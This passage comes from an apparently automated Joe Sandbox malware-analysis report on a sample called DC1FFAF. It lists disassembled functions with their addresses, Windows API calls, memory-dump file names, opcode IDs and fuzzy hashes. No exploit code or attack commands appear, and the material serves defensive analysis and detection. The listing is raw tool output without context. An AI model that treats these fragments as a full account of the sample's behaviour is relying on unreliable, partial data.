                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastselectsend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 948727196-0
                                                                                                                                      • Opcode ID: c3f1ff8669bcedb3a1a833b1a21ac54dbb248d3b24483e92bc72e2dfc9d4aaf2
                                                                                                                                      • Instruction ID: 0927743f002983ae56af59ef27624b954a1058ae6c0fe27142b543c218fbbe95
                                                                                                                                      • Opcode Fuzzy Hash: c3f1ff8669bcedb3a1a833b1a21ac54dbb248d3b24483e92bc72e2dfc9d4aaf2
                                                                                                                                      • Instruction Fuzzy Hash: 2D112B751083415FE310DFB4C945B6ABBE8FB88328F204A5EE19CCB291E7B4D5498B51
                                                                                                                                      Function 69E9A906 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _wscanf.LIBCMT ref: 69E9A91D
                                                                                                                                        • Part of subcall function 69EC2E99: _vscanf.LIBCMT ref: 69EC2EAC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _vscanf_wscanf
                                                                                                                                      • String ID: %1s
                                                                                                                                      • API String ID: 3728137994-3465968173
                                                                                                                                      • Opcode ID: addd599a058a18625ff857fe13f76d1a76ba6a4f57a3b489a005dc9c6564b12b
                                                                                                                                      • Instruction ID: 4d29f24ae7c6f1e372b3cad5824f2f3e572d60e7c345b5dad2c267f776918a00
                                                                                                                                      • Opcode Fuzzy Hash: addd599a058a18625ff857fe13f76d1a76ba6a4f57a3b489a005dc9c6564b12b
                                                                                                                                      • Instruction Fuzzy Hash: 7A411475D983428BCB10DB28998065FB7E1BF85338F21982DE8A94B311E771D846C792
                                                                                                                                      Function 00442BC0 Relevance: 3.6, APIs: 2, Instructions: 597COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00442C04
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                      • Opcode ID: 2ce334f71ed44f458dc72176d2f4fea89661d3498ee71ed64292472339cc5f84
                                                                                                                                      • Instruction ID: 3166b20bfafa6c8b5c190c092a844d05c56dc676aa568b38535e0b9c2064429f
                                                                                                                                      • Opcode Fuzzy Hash: 2ce334f71ed44f458dc72176d2f4fea89661d3498ee71ed64292472339cc5f84
                                                                                                                                      • Instruction Fuzzy Hash: 1262C034A00219CFDB24CF55C980BEDB7B2BB48309F6482DAD4596B395DB74AE86CF44
                                                                                                                                      Function 0047B10E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0047B115
                                                                                                                                        • Part of subcall function 00482BB7: _memset.LIBCMT ref: 00482BC9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3_memset
                                                                                                                                      • String ID: ank
                                                                                                                                      • API String ID: 2828583354-2538243836
                                                                                                                                      • Opcode ID: 6f6e36f44e7144d1839149a2f9f8a2536e819ed40c362fc6650d790ce69022f8
                                                                                                                                      • Instruction ID: 20b387da06a5a0262c18bd60b75b2b3f88e5e213ccf324f5118c6b609bca5867
                                                                                                                                      • Opcode Fuzzy Hash: 6f6e36f44e7144d1839149a2f9f8a2536e819ed40c362fc6650d790ce69022f8
                                                                                                                                      • Instruction Fuzzy Hash: A031487180025DAEDF01EFE0CC45EEEBBB8EF64344F00441AF905A7291EB789A15DBA5
                                                                                                                                      Function 00433F30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetWindowRgn.USER32(?,?,00000000,00000001), ref: 00433FBA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window
                                                                                                                                      • String ID: f:C
                                                                                                                                      • API String ID: 2353593579-2036834515
                                                                                                                                      • Opcode ID: 43a2f9e878944a144d87c3ebcf463623ec54c3feb6f91be007da0640033d4ad0
                                                                                                                                      • Instruction ID: 5aa6f8238e166cd1a541370376f4264830f6814aaf39c1997f10c2959927ca47
                                                                                                                                      • Opcode Fuzzy Hash: 43a2f9e878944a144d87c3ebcf463623ec54c3feb6f91be007da0640033d4ad0
                                                                                                                                      • Instruction Fuzzy Hash: 3421C8B1A002099BDB04DF98C985FBEB7F9AB8C704F24414DE504AB245D779AE01CB65
                                                                                                                                      Function 004988A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fsopen
                                                                                                                                      • String ID: +*F
                                                                                                                                      • API String ID: 3646066109-999119006
                                                                                                                                      • Opcode ID: e66af71de1faa7a68a46c90601ce728199fded7e3e0eebcb451bbbed62eabe6b
                                                                                                                                      • Instruction ID: fec3f27d5929e1b60752d2b88d64accaac4bfe388e6ea08abc08fd3437ac6941
                                                                                                                                      • Opcode Fuzzy Hash: e66af71de1faa7a68a46c90601ce728199fded7e3e0eebcb451bbbed62eabe6b
                                                                                                                                      • Instruction Fuzzy Hash: 00C0927244020C7BDF112A87EC02E4A3F1A9BC1774F148066FB1C19661AA77EA65A689
                                                                                                                                      Function 00461960 Relevance: 3.3, APIs: 2, Instructions: 269COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e38ee385e671ec405941ec6657ecf6a466683607d847c9db189fe4edbf0be498
                                                                                                                                      • Instruction ID: f4aa738d870eb57f91f3e3046ab2291173fc5b12c880ecc94dcbbefe3f7e609f
                                                                                                                                      • Opcode Fuzzy Hash: e38ee385e671ec405941ec6657ecf6a466683607d847c9db189fe4edbf0be498
                                                                                                                                      • Instruction Fuzzy Hash: E2C1D4B4A00208DFDB14CF99C594BAEB7B1FF48304F24819AE815AB391E735AE45DF85
                                                                                                                                      Function 004627C0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1579825452-0
                                                                                                                                      • Opcode ID: db0de4391c1a34949ad44ee9602f4c8596b77b75492d267950795a2cba3ff5ad
                                                                                                                                      • Instruction ID: 7cdfb113e68f73e28842214a5153390af39c99b0a73b4e9a698cbc9334f1463c
                                                                                                                                      • Opcode Fuzzy Hash: db0de4391c1a34949ad44ee9602f4c8596b77b75492d267950795a2cba3ff5ad
                                                                                                                                      • Instruction Fuzzy Hash: 87C159B0D04628ABDB24DF64DD857EEBBB0AF49304F5041DAE40966241E7B99EC0CF96
                                                                                                                                      Function 69E9A1F0 Relevance: 3.2, APIs: 2, Instructions: 171COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a39b741776549469e4a82952a423b8ef24ddbc36ed4df9f2f2208ad2880ad2cf
                                                                                                                                      • Instruction ID: 8d9fb311f06a3dccc634f05531f2ce9c0e4b693387d0210912ac2e6c967409bb
                                                                                                                                      • Opcode Fuzzy Hash: a39b741776549469e4a82952a423b8ef24ddbc36ed4df9f2f2208ad2880ad2cf
                                                                                                                                      • Instruction Fuzzy Hash: 46519DB9A047059FC708CF29D58162AF7E0BF88314FA0856EE9598B746DB31E854CF82
                                                                                                                                      Function 004625D0 Relevance: 3.2, APIs: 2, Instructions: 154fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004625EA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: 94f80ee20df82c10e3f5acd885f515f2558811de72d945631a6ec4e9e032adf0
                                                                                                                                      • Instruction ID: 9b16394e48d03f98d2f614784ae3e0925fed6f79c2ff49e42184e89ef86ce683
                                                                                                                                      • Opcode Fuzzy Hash: 94f80ee20df82c10e3f5acd885f515f2558811de72d945631a6ec4e9e032adf0
                                                                                                                                      • Instruction Fuzzy Hash: 8D51F075E00648FBCF04DBA4C991FEEBBB4AF55304F24809AE4016B341E679AF00DB5A
                                                                                                                                      Function 004419F0 Relevance: 3.1, APIs: 2, Instructions: 136COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00441A54
                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000000,00000000,?,?,?,00000001,00000014,?,00000000,6A51DC4D), ref: 00441B55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ShowWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                      • Opcode ID: d475ab444a2eff8cb23cda5387d476fd18cd5b84a0da2a0c7953a766f9eacd69
                                                                                                                                      • Instruction ID: fd0ac2f3cdc61ff589f131de7d99f5e8ae776ff10e42ef22016328667894cccd
                                                                                                                                      • Opcode Fuzzy Hash: d475ab444a2eff8cb23cda5387d476fd18cd5b84a0da2a0c7953a766f9eacd69
                                                                                                                                      • Instruction Fuzzy Hash: 2351A075A00209DFDB08DF98C994EEEB7B5BB8C314F149149E505BB350D738A982CB64
                                                                                                                                      Function 00481045 Relevance: 3.1, APIs: 2, Instructions: 111memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GlobalAlloc.KERNEL32(?,00000002,00000000,?,?,?,00000000,00000000,?,00481480,00000004,00480457,0046F749,0046E29C,?,0046FD5C), ref: 004810AF
                                                                                                                                      • _memset.LIBCMT ref: 00481122
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocGlobal_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2074659453-0
                                                                                                                                      • Opcode ID: f70fa82999807ad026b20a76115d91255f485e10474aea84ec0967acacd86a05
                                                                                                                                      • Instruction ID: 481823918c689907756eca190fe8fc1f0c1fdbb456287f88a116480f02565fd3
                                                                                                                                      • Opcode Fuzzy Hash: f70fa82999807ad026b20a76115d91255f485e10474aea84ec0967acacd86a05
                                                                                                                                      • Instruction Fuzzy Hash: 7431FF70900741AFD720AF69CC85E6FBBEDEF41304B05881FE48597622DB38E9828754
                                                                                                                                      Function 00441230 Relevance: 3.1, APIs: 2, Instructions: 102windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,000083F4,?,?), ref: 004412E8
                                                                                                                                      • SendMessageA.USER32(?,000083F4,?,?), ref: 0044131F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 202fa4ddc1a473aefdbddfa1d3c90fe32b8a00660453cc4f146efec60fba3470
                                                                                                                                      • Instruction ID: 5f01d1b8c6da42eff852c7ef59762ccc3ab959c4e330e90106856a115fd317a1
                                                                                                                                      • Opcode Fuzzy Hash: 202fa4ddc1a473aefdbddfa1d3c90fe32b8a00660453cc4f146efec60fba3470
                                                                                                                                      • Instruction Fuzzy Hash: 0041BA74A00209EFDB04DF94C584EAEB7B5FF88314F208559E9199B351D734EE81CBA4
                                                                                                                                      Function 00437B70 Relevance: 3.1, APIs: 2, Instructions: 84windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(00000000,00000030,00547B10,00000000), ref: 00437C26
                                                                                                                                      • SendMessageA.USER32(00000000,000001A0,000000FF,?), ref: 00437C52
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 0b5c9fddc4db8239d8e1a18e51a8ba48d27b127ab7fa5bf31ce762da03b5788d
                                                                                                                                      • Instruction ID: 8ff0bb76064d68541f3989c7337260534d2e59eeb9b762de6b9fae12da0437ae
                                                                                                                                      • Opcode Fuzzy Hash: 0b5c9fddc4db8239d8e1a18e51a8ba48d27b127ab7fa5bf31ce762da03b5788d
                                                                                                                                      • Instruction Fuzzy Hash: 67310B70A04209EFEB14CF84C995FAEB7B5FB48304F208299F955AB3C1D675AE01DB94
                                                                                                                                      Function 0043C6F0 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _strlen.LIBCMT ref: 0043C743
                                                                                                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0043C7B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3939138701-0
                                                                                                                                      • Opcode ID: 39e522c6cebb623e4ffe333ca9af14944bcc3e244284b12f7ba177558ab948ee
                                                                                                                                      • Instruction ID: 8d0b78b67aa3a619d4b3a7c3c56caa1003dd9d593d8194bdda76f9af957276a9
                                                                                                                                      • Opcode Fuzzy Hash: 39e522c6cebb623e4ffe333ca9af14944bcc3e244284b12f7ba177558ab948ee
                                                                                                                                      • Instruction Fuzzy Hash: 92312DB4A002099FDB04DF98C981BEFB7B5BF48704F20801EF906AB345D7389956CB95
                                                                                                                                      Function 69E87430 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3140232205-0
                                                                                                                                      • Opcode ID: 3b2e5844a71939c5c064109d36cc48b355c20a9dd6d51c5535b0ce9edb56d225
                                                                                                                                      • Instruction ID: 5a739432dbe07963ff3a804d7edd3a3e781768afe0e6e0808f1abedbe7730fde
                                                                                                                                      • Opcode Fuzzy Hash: 3b2e5844a71939c5c064109d36cc48b355c20a9dd6d51c5535b0ce9edb56d225
                                                                                                                                      • Instruction Fuzzy Hash: CC2126766042045FD300CF54D8929EFBBD9EBC9318F50892EF68DC7240EA35994C87E2
                                                                                                                                      Function 69E91120 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E90970: _memset.LIBCMT ref: 69E90A59
                                                                                                                                        • Part of subcall function 69E90970: _memset.LIBCMT ref: 69E90A76
                                                                                                                                      • SetEvent.KERNEL32(?), ref: 69E911C8
                                                                                                                                      • SetEvent.KERNEL32(?), ref: 69E911E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Event_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2932554400-0
                                                                                                                                      • Opcode ID: 818da96dfd28a99822a43ca0c87122f565b517bd37cddfc95d38c1f33e7c6d85
                                                                                                                                      • Instruction ID: 2294e20898c87f6a16ca2aa80e91ca75ded155ee86e65a648f0138adcc852fd1
                                                                                                                                      • Opcode Fuzzy Hash: 818da96dfd28a99822a43ca0c87122f565b517bd37cddfc95d38c1f33e7c6d85
                                                                                                                                      • Instruction Fuzzy Hash: DB214DB19083419FC711CF9AD58085BFBE4BB89308F904A6EE4CA93711D335EA48CB92
                                                                                                                                      Function 004366D0 Relevance: 3.1, APIs: 2, Instructions: 70windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _strlen.LIBCMT ref: 00436724
                                                                                                                                      • SendMessageA.USER32(?,00000030,00547B10,00000000), ref: 00436782
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3939138701-0
